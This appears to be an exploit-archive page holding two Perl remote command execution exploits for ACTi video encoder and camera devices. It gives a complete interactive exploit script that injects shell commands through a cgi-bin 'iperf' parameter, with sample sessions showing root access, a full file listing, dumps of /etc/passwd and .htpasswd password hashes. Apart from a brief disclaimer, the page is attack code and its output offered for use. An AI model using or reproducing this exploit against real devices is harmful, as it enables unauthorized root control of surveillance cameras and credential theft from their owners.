# # [ execute : /sbin/iperf -c ;cat cmd/.htpasswd &
# # [ admin:rGtBkUV3A76PC
# # [ Admin:rGtBkUV3A76PC
# # [ # find / -type f
# # [ execute : /sbin/iperf -c ;find / -type f &
# # [ /bin/busybox
# # [ /etc/fstab
# # [ /etc/thttpd/thttpd.conf
# # [ /etc/thttpd/thttpd.throttles
# # [ /etc/services
# # [ /etc/resolv.conf
# # [ /etc/profile
# # [ /etc/init.d/rcS
# # [ /etc/init.d/bootstrap
# # [ /etc/init.d/oem_load
# # [ /etc/init.d/system_load
# # [ /etc/init.d/thttpd
# # [ /etc/init.d/daemon_manager
# # [ /etc/init.d/modules
# # [ /etc/init.d/ddns
# # [ /etc/init.d/syslog
# # [ /etc/init.d/hostname
# # [ /etc/init.d/set_port_speed
# # [ /etc/init.d/get_wan_config
# # [ /etc/init.d/myserver
# # [ /etc/init.d/wan
# # [ /etc/init.d/datetime
# # [ /etc/init.d/dns
# # [ /etc/init.d/boot_sync
# # [ /etc/init.d/profile_load
# # [ /etc/init.d/datetime_rackmount
# # [ /etc/group
# # [ /etc/passwd
# # [ /etc/host.conf
# # [ /etc/inittab
# # [ /etc/ppp/plugins/rp-pppoe.so
# # [ /etc/ppp/resolv.conf
# # [ /etc/ppp/ip-down
# # [ /etc/ppp/ip-up
# # [ /etc/protocols
# # [ /etc/config/update.conf
# # [ /etc/default/default.conf
# # [ /etc/default/version
# # [ /etc/default/default.pppoe
# # [ /etc/default/build_date
# # [ /etc/default/global_options
# # [ /etc/default/boot_version
# # [ /etc/default/profile/camera.bin
# # [ /etc/default/profile/firmware.bin
# # [ /etc/default/profile/profile_id
# # [ /etc/default/profile/NameMap
# # [ /etc/default/profile/fw_cap.bin
# # [ /etc/default/model
# # [ /etc/default/fw_type
# # [ /etc/default/device
# # [ /etc/default/mac
# # [ /etc/default/serial
# # [ /etc/default/property
# # [ /etc/hosts
# # [ /lib/ld-uClibc-0.9.15.so
# # [ /lib/libcrypt-0.9.15.so
# # [ /lib/libdl-0.9.15.so
# # [ /lib/libm-0.9.15.so
# # [ /lib/libpthread-0.9.15.so
# # [ /lib/libresolv-0.9.15.so
# # [ /lib/libuClibc-0.9.15.so
# # [ /lib/libutil-0.9.15.so
# # [ /lib/modules/2.4.19-rmk4/acap_drv.o
# # [ /lib/modules/2.4.19-rmk4/ds1339_rtc.o
# # [ /lib/modules/2.4.19-rmk4/sound_drv.o
# # [ /proc/mtd
# # [ /proc/asoc2200_eth/DATA
# # [ /proc/misc
# # [ /proc/cpu/alignment
# # [ /proc/tty/drivers
# # [ /proc/tty/ldiscs
# # [ /proc/tty/driver/serial
# # [ /proc/sys/abi/fake_utsname
# # [ /proc/sys/abi/trace
# # [ /proc/sys/abi/defhandler_libcso
# # [ /proc/sys/abi/defhandler_lcall7
# # [ /proc/sys/abi/defhandler_elf
# # [ /proc/sys/abi/defhandler_coff
# # [ /proc/sys/fs/lease-break-time
# # [ /proc/sys/fs/dir-notify-enable
# # [ /proc/sys/fs/leases-enable
# # [ /proc/sys/fs/overflowgid
# # [ /proc/sys/fs/overflowuid
# # [ /proc/sys/fs/dentry-state
# # [ /proc/sys/fs/dquot-nr
# # [ /proc/sys/fs/file-max
# # [ /proc/sys/fs/file-nr
# # [ /proc/sys/fs/inode-state
# # [ /proc/sys/fs/inode-nr
# # [ /proc/sys/net/unix/max_dgram_qlen
# # [ /proc/sys/net/ipv4/conf/eth0/arp_filter
# # [ /proc/sys/net/ipv4/conf/eth0/tag
# # [ /proc/sys/net/ipv4/conf/eth0/log_martians
# # [ /proc/sys/net/ipv4/conf/eth0/bootp_relay
# # [ /proc/sys/net/ipv4/conf/eth0/medium_id
# # [ /proc/sys/net/ipv4/conf/eth0/proxy_arp
# # [ /proc/sys/net/ipv4/conf/eth0/accept_source_route
# # [ /proc/sys/net/ipv4/conf/eth0/send_redirects
# # [ /proc/sys/net/ipv4/conf/eth0/rp_filter
# # [ /proc/sys/net/ipv4/conf/eth0/shared_media
# # [ /proc/sys/net/ipv4/conf/eth0/secure_redirects
# # [ /proc/sys/net/ipv4/conf/eth0/accept_redirects
# # [ /proc/sys/net/ipv4/conf/eth0/mc_forwarding
# # [ /proc/sys/net/ipv4/conf/eth0/forwarding
# # [ /proc/sys/net/ipv4/conf/default/arp_filter
# # [ /proc/sys/net/ipv4/conf/default/tag
# # [ /proc/sys/net/ipv4/conf/default/log_martians
# # [ /proc/sys/net/ipv4/conf/default/bootp_relay
# # [ /proc/sys/net/ipv4/conf/default/medium_id
# # [ /proc/sys/net/ipv4/conf/default/proxy_arp
# # [ /proc/sys/net/ipv4/conf/default/accept_source_route
# # [ /proc/sys/net/ipv4/conf/default/send_redirects
# # [ /proc/sys/net/ipv4/conf/default/rp_filter
# # [ /proc/sys/net/ipv4/conf/default/shared_media
# # [ /proc/sys/net/ipv4/conf/default/secure_redirects
# # [ /proc/sys/net/ipv4/conf/default/accept_redirects
# # [ /proc/sys/net/ipv4/conf/default/mc_forwarding
# # [ /proc/sys/net/ipv4/conf/default/forwarding
# # [ /proc/sys/net/ipv4/conf/all/arp_filter
# # [ /proc/sys/net/ipv4/conf/all/tag
# # [ /proc/sys/net/ipv4/conf/all/log_martians
# # [ /proc/sys/net/ipv4/conf/all/bootp_relay
# # [ /proc/sys/net/ipv4/conf/all/medium_id
# # [ /proc/sys/net/ipv4/conf/all/proxy_arp
# # [ /proc/sys/net/ipv4/conf/all/accept_source_route
# # [ /proc/sys/net/ipv4/conf/all/send_redirects
# # [ /proc/sys/net/ipv4/conf/all/rp_filter
# # [ /proc/sys/net/ipv4/conf/all/shared_media
# # [ /proc/sys/net/ipv4/conf/all/secure_redirects
# # [ /proc/sys/net/ipv4/conf/all/accept_redirects
# # [ /proc/sys/net/ipv4/conf/all/mc_forwarding
# # [ /proc/sys/net/ipv4/conf/all/forwarding
# # [ /proc/sys/net/ipv4/neigh/eth0/locktime
# # [ /proc/sys/net/ipv4/neigh/eth0/proxy_delay
# # [ /proc/sys/net/ipv4/neigh/eth0/anycast_delay
# # [ /proc/sys/net/ipv4/neigh/eth0/proxy_qlen
# # [ /proc/sys/net/ipv4/neigh/eth0/unres_qlen
# # [ /proc/sys/net/ipv4/neigh/eth0/gc_stale_time
# # [ /proc/sys/net/ipv4/neigh/eth0/delay_first_probe_time
# # [ /proc/sys/net/ipv4/neigh/eth0/base_reachable_time
# # [ /proc/sys/net/ipv4/neigh/eth0/retrans_time
# # [ /proc/sys/net/ipv4/neigh/eth0/app_solicit
# # [ /proc/sys/net/ipv4/neigh/eth0/ucast_solicit
# # [ /proc/sys/net/ipv4/neigh/eth0/mcast_solicit
# # [ /proc/sys/net/ipv4/neigh/default/gc_thresh3
# # [ /proc/sys/net/ipv4/neigh/default/gc_thresh2
# # [ /proc/sys/net/ipv4/neigh/default/gc_thresh1
# # [ /proc/sys/net/ipv4/neigh/default/gc_interval
# # [ /proc/sys/net/ipv4/neigh/default/locktime
# # [ /proc/sys/net/ipv4/neigh/default/proxy_delay
# # [ /proc/sys/net/ipv4/neigh/default/anycast_delay
# # [ /proc/sys/net/ipv4/neigh/default/proxy_qlen
# # [ /proc/sys/net/ipv4/neigh/default/unres_qlen
# # [ /proc/sys/net/ipv4/neigh/default/gc_stale_time
# # [ /proc/sys/net/ipv4/neigh/default/delay_first_probe_time
# # [ /proc/sys/net/ipv4/neigh/default/base_reachable_time
# # [ /proc/sys/net/ipv4/neigh/default/retrans_time
# # [ /proc/sys/net/ipv4/neigh/default/app_solicit
# # [ /proc/sys/net/ipv4/neigh/default/ucast_solicit
# # [ /proc/sys/net/ipv4/neigh/default/mcast_solicit
# # [ /proc/sys/net/ipv4/tcp_tw_reuse
# # [ /proc/sys/net/ipv4/icmp_ratemask
# # [ /proc/sys/net/ipv4/icmp_ratelimit
# # [ /proc/sys/net/ipv4/tcp_adv_win_scale
# # [ /proc/sys/net/ipv4/tcp_app_win
# # [ /proc/sys/net/ipv4/tcp_rmem
# # [ /proc/sys/net/ipv4/tcp_wmem
# # [ /proc/sys/net/ipv4/tcp_mem
# # [ /proc/sys/net/ipv4/tcp_dsack
# # [ /proc/sys/net/ipv4/tcp_ecn
# # [ /proc/sys/net/ipv4/tcp_reordering
# # [ /proc/sys/net/ipv4/tcp_fack
# # [ /proc/sys/net/ipv4/tcp_orphan_retries
# # [ /proc/sys/net/ipv4/inet_peer_gc_maxtime
# # [ /proc/sys/net/ipv4/inet_peer_gc_mintime
# # [ /proc/sys/net/ipv4/inet_peer_maxttl
# # [ /proc/sys/net/ipv4/inet_peer_minttl
# # [ /proc/sys/net/ipv4/inet_peer_threshold
# # [ /proc/sys/net/ipv4/route/min_adv_mss
# # [ /proc/sys/net/ipv4/route/min_pmtu
# # [ /proc/sys/net/ipv4/route/mtu_expires
# # [ /proc/sys/net/ipv4/route/gc_elasticity
# # [ /proc/sys/net/ipv4/route/error_burst
# # [ /proc/sys/net/ipv4/route/error_cost
# # [ /proc/sys/net/ipv4/route/redirect_silence
# # [ /proc/sys/net/ipv4/route/redirect_number
# # [ /proc/sys/net/ipv4/route/redirect_load
# # [ /proc/sys/net/ipv4/route/gc_interval
# # [ /proc/sys/net/ipv4/route/gc_timeout
# # [ /proc/sys/net/ipv4/route/gc_min_interval
# # [ /proc/sys/net/ipv4/route/max_size
# # [ /proc/sys/net/ipv4/route/gc_thresh
# # [ /proc/sys/net/ipv4/route/max_delay
# # [ /proc/sys/net/ipv4/route/min_delay
# # [ /proc/sys/net/ipv4/route/flush
# # [ /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
# # [ /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
# # [ /proc/sys/net/ipv4/icmp_echo_ignore_all
# # [ /proc/sys/net/ipv4/ip_local_port_range
# # [ /proc/sys/net/ipv4/tcp_max_syn_backlog
# # [ /proc/sys/net/ipv4/tcp_rfc1337
# # [ /proc/sys/net/ipv4/tcp_stdurg
# # [ /proc/sys/net/ipv4/tcp_abort_on_overflow
# # [ /proc/sys/net/ipv4/tcp_tw_recycle
# # [ /proc/sys/net/ipv4/tcp_fin_timeout
# # [ /proc/sys/net/ipv4/tcp_retries2
# # [ /proc/sys/net/ipv4/tcp_retries1
# # [ /proc/sys/net/ipv4/tcp_keepalive_intvl
# # [ /proc/sys/net/ipv4/tcp_keepalive_probes
# # [ /proc/sys/net/ipv4/tcp_keepalive_time
# # [ /proc/sys/net/ipv4/ipfrag_time
# # [ /proc/sys/net/ipv4/ip_dynaddr
# # [ /proc/sys/net/ipv4/ipfrag_low_thresh
# # [ /proc/sys/net/ipv4/ipfrag_high_thresh
# # [ /proc/sys/net/ipv4/tcp_max_tw_buckets
# # [ /proc/sys/net/ipv4/tcp_max_orphans
# # [ /proc/sys/net/ipv4/tcp_synack_retries
# # [ /proc/sys/net/ipv4/tcp_syn_retries
# # [ /proc/sys/net/ipv4/ip_nonlocal_bind
# # [ /proc/sys/net/ipv4/ip_no_pmtu_disc
# # [ /proc/sys/net/ipv4/ip_autoconfig
# # [ /proc/sys/net/ipv4/ip_default_ttl
# # [ /proc/sys/net/ipv4/ip_forward
# # [ /proc/sys/net/ipv4/tcp_retrans_collapse
# # [ /proc/sys/net/ipv4/tcp_sack
# # [ /proc/sys/net/ipv4/tcp_window_scaling
# # [ /proc/sys/net/ipv4/tcp_timestamps
# # [ /proc/sys/net/core/hot_list_length
# # [ /proc/sys/net/core/optmem_max
# # [ /proc/sys/net/core/message_burst
# # [ /proc/sys/net/core/message_cost
# # [ /proc/sys/net/core/mod_cong
# # [ /proc/sys/net/core/lo_cong
# # [ /proc/sys/net/core/no_cong
# # [ /proc/sys/net/core/no_cong_thresh
# # [ /proc/sys/net/core/netdev_max_backlog
# # [ /proc/sys/net/core/rmem_default
# # [ /proc/sys/net/core/wmem_default
# # [ /proc/sys/net/core/rmem_max
# # [ /proc/sys/net/core/wmem_max
# # [ /proc/sys/vm/max_map_count
# # [ /proc/sys/vm/max-readahead
# # [ /proc/sys/vm/min-readahead
# # [ /proc/sys/vm/page-cluster
# # [ /proc/sys/vm/pagetable_cache
# # [ /proc/sys/vm/kswapd
# # [ /proc/sys/vm/overcommit_memory
# # [ /proc/sys/vm/bdflush
# # [ /proc/sys/kernel/overflowgid
# # [ /proc/sys/kernel/overflowuid
# # [ /proc/sys/kernel/random/uuid
# # [ /proc/sys/kernel/random/boot_id
# # [ /proc/sys/kernel/random/write_wakeup_threshold
# # [ /proc/sys/kernel/random/read_wakeup_threshold
# # [ /proc/sys/kernel/random/entropy_avail
# # [ /proc/sys/kernel/random/poolsize
# # [ /proc/sys/kernel/threads-max
# # [ /proc/sys/kernel/cad_pid
# # [ /proc/sys/kernel/sem
# # [ /proc/sys/kernel/msgmnb
# # [ /proc/sys/kernel/msgmni
# # [ /proc/sys/kernel/msgmax
# # [ /proc/sys/kernel/shmmni
# # [ /proc/sys/kernel/shmall
# # [ /proc/sys/kernel/shmmax
# # [ /proc/sys/kernel/rtsig-max
# # [ /proc/sys/kernel/rtsig-nr
# # [ /proc/sys/kernel/printk
# # [ /proc/sys/kernel/ctrl-alt-del
# # [ /proc/sys/kernel/real-root-dev
# # [ /proc/sys/kernel/cap-bound
# # [ /proc/sys/kernel/tainted
# # [ /proc/sys/kernel/core_uses_pid
# # [ /proc/sys/kernel/panic
# # [ /proc/sys/kernel/domainname
# # [ /proc/sys/kernel/hostname
# # [ /proc/sys/kernel/version
# # [ /proc/sys/kernel/osrelease
# # [ /proc/sys/kernel/ostype
# # [ /proc/sysvipc/shm
# # [ /proc/sysvipc/msg
# # [ /proc/sysvipc/sem
# # [ /proc/net/packet
# # [ /proc/net/unix
# # [ /proc/net/udp
# # [ /proc/net/tcp
# # [ /proc/net/sockstat
# # [ /proc/net/snmp
# # [ /proc/net/netstat
# # [ /proc/net/raw
# # [ /proc/net/rt_cache_stat
# # [ /proc/net/rt_cache
# # [ /proc/net/route
# # [ /proc/net/arp
# # [ /proc/net/netlink
# # [ /proc/net/pppoe
# # [ /proc/net/dev_mcast
# # [ /proc/net/softnet_stat
# # [ /proc/net/dev
# # [ /proc/kcore
# # [ /proc/ksyms
# # [ /proc/slabinfo
# # [ /proc/cpuinfo
# # [ /proc/kmsg
# # [ /proc/execdomains
# # [ /proc/iomem
# # [ /proc/swaps
# # [ /proc/locks
# # [ /proc/cmdline
# # [ /proc/ioports
# # [ /proc/filesystems
# # [ /proc/interrupts
# # [ /proc/partitions
# # [ /proc/devices
# # [ /proc/stat
# # [ /proc/modules
# # [ /proc/version
# # [ /proc/meminfo
# # [ /proc/uptime
# # [ /proc/loadavg
# # [ /proc/1/environ
# # [ /proc/1/status
# # [ /proc/1/cmdline
# # [ /proc/1/stat
# # [ /proc/1/statm
# # [ /proc/1/maps
# # [ /proc/1/mem
# # [ /proc/1/mounts
# # [ /proc/2/environ
# # [ /proc/2/status
# # [ /proc/2/cmdline
# # [ /proc/2/stat
# # [ /proc/2/statm
# # [ /proc/2/maps
# # [ /proc/2/mem
# # [ /proc/2/mounts
# # [ /proc/3/environ
# # [ /proc/3/status
# # [ /proc/3/cmdline
# # [ /proc/3/stat
# # [ /proc/3/statm
# # [ /proc/3/maps
# # [ /proc/3/mem
# # [ /proc/3/mounts
# # [ /proc/4/environ
# # [ /proc/4/status
# # [ /proc/4/cmdline
# # [ /proc/4/stat
# # [ /proc/4/statm
# # [ /proc/4/maps
# # [ /proc/4/mem
# # [ /proc/4/mounts
# # [ /proc/5/environ
# # [ /proc/5/status
# # [ /proc/5/cmdline
# # [ /proc/5/stat
# # [ /proc/5/statm
# # [ /proc/5/maps
# # [ /proc/5/mem
# # [ /proc/5/mounts
# # [ /proc/6/environ
# # [ /proc/6/status
# # [ /proc/6/cmdline
# # [ /proc/6/stat
# # [ /proc/6/statm
# # [ /proc/6/maps
# # [ /proc/6/mem
# # [ /proc/6/mounts
# # [ find: /proc/7/fd: No such file or directory
# # [ /proc/7/environ
# # [ /proc/7/status
# # [ /proc/7/cmdline
# # [ /proc/7/stat
# # [ /proc/7/statm
# # [ /proc/7/maps
# # [ /proc/7/mem
# # [ /proc/7/mounts
# # [ /proc/14/environ
# # [ /proc/14/status
# # [ /proc/14/cmdline
# # [ /proc/14/stat
# # [ /proc/14/statm
# # [ /proc/14/maps
# # [ /proc/14/mem
# # [ /proc/14/mounts
# # [ /proc/132/environ
# # [ /proc/132/status
# # [ /proc/132/cmdline
# # [ /proc/132/stat
# # [ /proc/132/statm
# # [ /proc/132/maps
# # [ /proc/132/mem
# # [ /proc/132/mounts
# # [ /proc/142/environ
# # [ /proc/142/status
# # [ /proc/142/cmdline
# # [ /proc/142/stat
# # [ /proc/142/statm
# # [ /proc/142/maps
# # [ /proc/142/mem
# # [ /proc/142/mounts
# # [ /proc/153/environ
# # [ /proc/153/status
# # [ /proc/153/cmdline
# # [ /proc/153/stat
# # [ /proc/153/statm
# # [ /proc/153/maps
# # [ /proc/153/mem
# # [ /proc/153/mounts
# # [ /proc/155/environ
# # [ /proc/155/status
# # [ /proc/155/cmdline
# # [ /proc/155/stat
# # [ /proc/155/statm
# # [ /proc/155/maps
# # [ /proc/155/mem
# # [ /proc/155/mounts
# # [ /proc/157/environ
# # [ /proc/157/status
# # [ /proc/157/cmdline
# # [ /proc/157/stat
# # [ /proc/157/statm
# # [ /proc/157/maps
# # [ /proc/157/mem
# # [ /proc/157/mounts
# # [ /proc/158/environ
# # [ /proc/158/status
# # [ /proc/158/cmdline
# # [ /proc/158/stat
# # [ /proc/158/statm
# # [ /proc/158/maps
# # [ /proc/158/mem
# # [ /proc/158/mounts
# # [ /proc/171/environ
# # [ /proc/171/status
# # [ /proc/171/cmdline
# # [ /proc/171/stat
# # [ /proc/171/statm
# # [ /proc/171/maps
# # [ /proc/171/mem
# # [ /proc/171/mounts
# # [ /proc/172/environ
# # [ /proc/172/status
# # [ /proc/172/cmdline
# # [ /proc/172/stat
# # [ /proc/172/statm
# # [ /proc/172/maps
# # [ /proc/172/mem
# # [ /proc/172/mounts
# # [ /proc/173/environ
# # [ /proc/173/status
# # [ /proc/173/cmdline
# # [ /proc/173/stat
# # [ /proc/173/statm
# # [ /proc/173/maps
# # [ /proc/173/mem
# # [ /proc/173/mounts
# # [ /proc/174/environ
# # [ /proc/174/status
# # [ /proc/174/cmdline
# # [ /proc/174/stat
# # [ /proc/174/statm
# # [ /proc/174/maps
# # [ /proc/174/mem
# # [ /proc/174/mounts
# # [ /proc/175/environ
# # [ /proc/175/status
# # [ /proc/175/cmdline
# # [ /proc/175/stat
# # [ /proc/175/statm
# # [ /proc/175/maps
# # [ /proc/175/mem
# # [ /proc/175/mounts
# # [ /proc/26407/environ
# # [ /proc/26407/status
# # [ /proc/26407/cmdline
# # [ /proc/26407/stat
# # [ /proc/26407/statm
# # [ /proc/26407/maps
# # [ /proc/26407/mem
# # [ /proc/26407/mounts
# # [ /proc/26410/environ
# # [ /proc/26410/status
# # [ /proc/26410/cmdline
# # [ /proc/26410/stat
# # [ /proc/26410/statm
# # [ /proc/26410/maps
# # [ /proc/26410/mem
# # [ /proc/26410/mounts
# # [ /sbin/dhcpcd
# # [ /sbin/ez-ipupdate
# # [ /sbin/htpasswd
# # [ /sbin/iperf
# # [ /sbin/thttpd
# # [ /usr/sbin/mount_nfs_drive
# # [ /usr/sbin/ll
# # [ /usr/sbin/system_info
# # [ /usr/sbin/read_dev_info
# # [ /usr/sbin/acti_config
# # [ /usr/sbin/show_progress
# # [ /usr/sbin/ddns_monitor
# # [ /usr/sbin/wan_status
# # [ /usr/sbin/adsl-connect
# # [ /usr/sbin/adsl-setup
# # [ /usr/sbin/acti_report
# # [ /usr/sbin/pppd
# # [ /usr/sbin/pppoe
# # [ /usr/sbin/acti_upgrade
# # [ /usr/sbin/thttpd_monitor
# # [ /usr/sbin/acti_485
# # [ /usr/sbin/dbg
# # [ /usr/sbin/ntpclient
# # [ /usr/sbin/acti_upgradem
# # [ /usr/sbin/dhcp_retry
# # [ /usr/sbin/pppoe_monitor
# # [ /usr/sbin/acti_reboot
# # [ /usr/sbin/acti_msg
# # [ /usr/sbin/mount_tmpfs
# # [ /usr/sbin/shell_relay
# # [ /usr/sbin/acti_logger
# # [ /usr/sbin/boot_ctrl
# # [ /usr/sbin/acti_gpio
# # [ /usr/sbin/acti_rs485
# # [ /usr/sbin/acti_rtc
# # [ /usr/sbin/acti_reg
# # [ /usr/sbin/conf_sync
# # [ /usr/sbin/conf_convert
# # [ /usr/sbin/bin2devinfo
# # [ /usr/sbin/audio_tester
# # [ /usr/sbin/bin2profile
# # [ /usr/sbin/acti-server
# # [ /usr/bin/setsid
# # [ /var/run/dev.bin
# # [ /var/run/system_type
# # [ /var/run/channel
# # [ /var/run/sys_conf.bin
# # [ /var/run/wan_state
# # [ /var/run/wanip_config
# # [ /var/run/encoder_run
# # [ /var/log/systemlog.txt
# # [ /var/log/wan_info_brief.txt
# # [ /var/log/system_info_web.txt
# # [ /var/log/system_info_url.txt
# # [ /var/www/images/Space.gif
# # [ /var/www/images/bar.gif
# # [ /var/www/images/bar2.gif
# # [ /var/www/images/icon.gif
# # [ /var/www/images/layout.gif
# # [ /var/www/images/r0-100.gif
# # [ /var/www/images/header_red.jpg
# # [ /var/www/images/ie_error.bmp
# # [ /var/www/images/r0-255.gif
# # [ /var/www/images/ptz_center_1.gif
# # [ /var/www/images/ptz_down_1.gif
# # [ /var/www/images/ptz_left_1.gif
# # [ /var/www/images/ptz_leftdown_1.gif
# # [ /var/www/images/ptz_leftup_1.gif
# # [ /var/www/images/ptz_right_1.gif
# # [ /var/www/images/ptz_rightdown_1.gif
# # [ /var/www/images/ptz_rightup_1.gif
# # [ /var/www/images/ptz_up_1.gif
# # [ /var/www/images/add.jpg
# # [ /var/www/images/delete.jpg
# # [ /var/www/images/focusin.jpg
# # [ /var/www/images/focusout.jpg
# # [ /var/www/images/home.jpg
# # [ /var/www/images/reset.jpg
# # [ /var/www/images/tele.jpg
# # [ /var/www/images/wide.jpg
# # [ /var/www/images/Num00.jpg
# # [ /var/www/images/Num01.jpg
# # [ /var/www/cgi-bin/cmd/system
# # [ /var/www/cgi-bin/cmd/mpeg4
# # [ /var/www/cgi-bin/cmd/encoder
# # [ /var/www/cgi-bin/cmd/.htpasswd
# # [ /var/www/cgi-bin/80503736
# # [ /var/www/cgi-bin/update
# # [ /var/www/cgi-bin/updatem
# # [ /var/www/cgi-bin/macdev
# # [ /var/www/cgi-bin/system
# # [ /var/www/cgi-bin/mpeg4
# # [ /var/www/cgi-bin/test
# # [ /var/www/cgi-bin/encoder
# # [ /var/www/cgi-bin/web1.cgi
# # [ /var/www/default.css
# # [ /var/www/index.htm
# # [ /var/www/profile/cze.bin
# # [ /var/www/profile/dan.bin
# # [ /var/www/profile/eng.bin
# # [ /var/www/profile/fin.bin
# # [ /var/www/profile/fre.bin
# # [ /var/www/profile/ger.bin
# # [ /var/www/profile/hun.bin
# # [ /var/www/profile/ita.bin
# # [ /var/www/profile/jap.bin
# # [ /var/www/profile/lang_table.bin
# # [ /var/www/profile/por.bin
# # [ /var/www/profile/sch.bin
# # [ /var/www/profile/spa.bin
# # [ /var/www/profile/tch.bin
# # [ /var/www/nvEPLMedia.ocx
# # [ /var/www/pid
# # [ #
# #
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
$| = 1;
print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0
print "[ ACTi ACD-2100 Video Encoder Remote Command Execution Exploit
[ ============================================================
[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>
";
if(not defined $ARGV[0])
{
print "[ Usage: perl $0 [target]\n";
print "[ Example: perl $0 192.168.1.1\n\n";
exit;
}
my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0];
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new();
$browser->timeout(10);
$browser->agent($user_agent);
my $target = $host."/cgi-bin/";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request);
print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');
if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){
print "[ Server: ", $response->header('Server'), "\n";
print "[ The target is vulnerable\n";
print "[\n[ Directory Traversal\n";
my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
my @files = $tree->look_down(_tag => 'a');
print "[ ", $host.$_->attr('href'), "\n" for @files;
print "[\n[ Got root?\n";
while(1){
my $cmd;
print "[ \# ";
chomp($cmd = <STDIN>);
if($cmd eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}
exit if $cmd eq 'exit';
my $target = $host."/cgi-bin/test?iperf=;".$cmd;
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ ", $_, "\n" for split(/\n/,$response->content());
}
} else {
print "[ Exploit failed! The target isn't vulnerable\n";
exit;
}
↧
ACTi ACM-5611 Video Camera Remote Command Execution
ACTi ACM-5611 video camera remote command execution exploit.
1fc8c409a8a32a076776b237cf33f617#!/usr/bin/perl
#
# ACTi ACM-5611 Video Camera Remote Command Execution Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
# Firmware Version = A1D-220-V3.08.08-AC
# Production ID = ACM5611-08G-X-00485
# Factory Default Type = NTSC, Composite, Two Ways Audio (0x71)
# Company Name = ACTi Corporation
# WEB Site = www.acti.com
# Profile ID = MT9M131-RB0_V080507A
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# # [ ACTi ACM-5611 Video Camera Remote Command Execution Exploit
# # [ ============================================================
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [ Server: thttpd/2.25b 29dec2003
# # [ The target is vulnerable
# # [
# # [ Directory Traversal
# # [ http://192.168.1.1/cgi-bin/./
# # [ http://192.168.1.1/cgi-bin/../
# # [ http://192.168.1.1/cgi-bin/80503736
# # [ http://192.168.1.1/cgi-bin/cmd/
# # [ http://192.168.1.1/cgi-bin/encoder
# # [ http://192.168.1.1/cgi-bin/macdev
# # [ http://192.168.1.1/cgi-bin/mpeg4
# # [ http://192.168.1.1/cgi-bin/system
# # [ http://192.168.1.1/cgi-bin/test
# # [ http://192.168.1.1/cgi-bin/update
# # [ http://192.168.1.1/cgi-bin/updatem
# # [ http://192.168.1.1/cgi-bin/url.cgi
# # [ http://192.168.1.1/cgi-bin/videoconfiguration.cgi
# # [ http://192.168.1.1/cgi-bin/web1.cgi
# # [
# # [ Got root?
# # [ # id
# # [ execute : /sbin/iperf -c ;id &
# # [ uid=0(root) gid=0(root)
# # [ # ls -la
# # [ execute : /sbin/iperf -c ;ls -la &
# # [ -rwxr-xr-x 1 0 0 211088 web1.cgi
# # [ -rwxr-xr-x 1 0 0 106124 encoder
# # [ -rwxr-xr-x 1 0 0 54084 test
# # [ -rwxr-xr-x 1 0 0 79756 mpeg4
# # [ -rwxr-xr-x 1 0 0 89604 system
# # [ -rwxr-xr-x 1 0 0 21592 macdev
# # [ -rwxr-xr-x 1 0 0 57504 updatem
# # [ -rwxr-xr-x 1 0 0 58560 update
# # [ lrwxrwxrwx 1 0 0 8 videoconfiguration.cgi -> web1.cgi
# # [ lrwxrwxrwx 1 0 0 6 url.cgi -> system
# # [ -rwxr-xr-x 1 0 0 52888 80503736
# # [ drwxr-xr-x 2 0 0 1024 cmd
# # [ drwxr-xr-x 5 0 0 1024 ..
# # [ drw-r--r-- 3 0 0 1024 .
# # [ # ls -la /var/log/
# # [ execute : /sbin/iperf -c ;ls -la /var/log/ &
# # [ -rw-r--r-- 1 0 0 259 system_info_url.txt
# # [ -rw-r--r-- 1 0 0 259 system_info_web.txt
# # [ -rw-r--r-- 1 0 0 82 wan_info_brief.txt
# # [ -rw-r--r-- 1 0 0 455 systemlog.txt
# # [ drwxr-xr-x 5 0 0 1024 ..
# # [ drwxr-xr-x 2 0 0 1024 .
# # [ # cat /etc/passwd
# # [ execute : /sbin/iperf -c ;cat /etc/passwd &
# # [ root::0:0:root:/root:/bin/bash
# # [ bin:*:1:1:bin:/bin:
# # [ daemon:*:2:2:daemon:/usr/sbin:
# # [ sys:*:3:3:sys:/dev:
# # [ adm:*:4:4:adm:/var/adm:
# # [ lp:*:5:7:lp:/var/spool/lpd:
# # [ sync:*:6:8:sync:/bin:/bin/sync
# # [ shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown
# # [ halt:*:8:10:halt:/sbin:/sbin/halt
# # [ mail:*:9:11:mail:/var/spool/mail:
# # [ news:*:10:12:news:/var/spool/news:
# # [ uucp:*:11:13:uucp:/var/spool/uucp:
# # [ operator:*:12:0:operator:/root:
# # [ games:*:13:100:games:/usr/games:
# # [ ftp:*:15:14:ftp:/var/ftp:
# # [ man:*:16:100:man:/var/cache/man:
# # [ nobody:*:65534:65534:nobody:/home:/bin/sh
# # [ # cat cmd/.htpasswd
# # [ execute : /sbin/iperf -c ;cat cmd/.htpasswd &
# # [ admin:dUHDw321YSAkP
# # [ Admin:dUHDw321YSAkP
# # [ # find / -type f
# # [ execute : /sbin/iperf -c ;find / -type f &
# # [ /bin/busybox
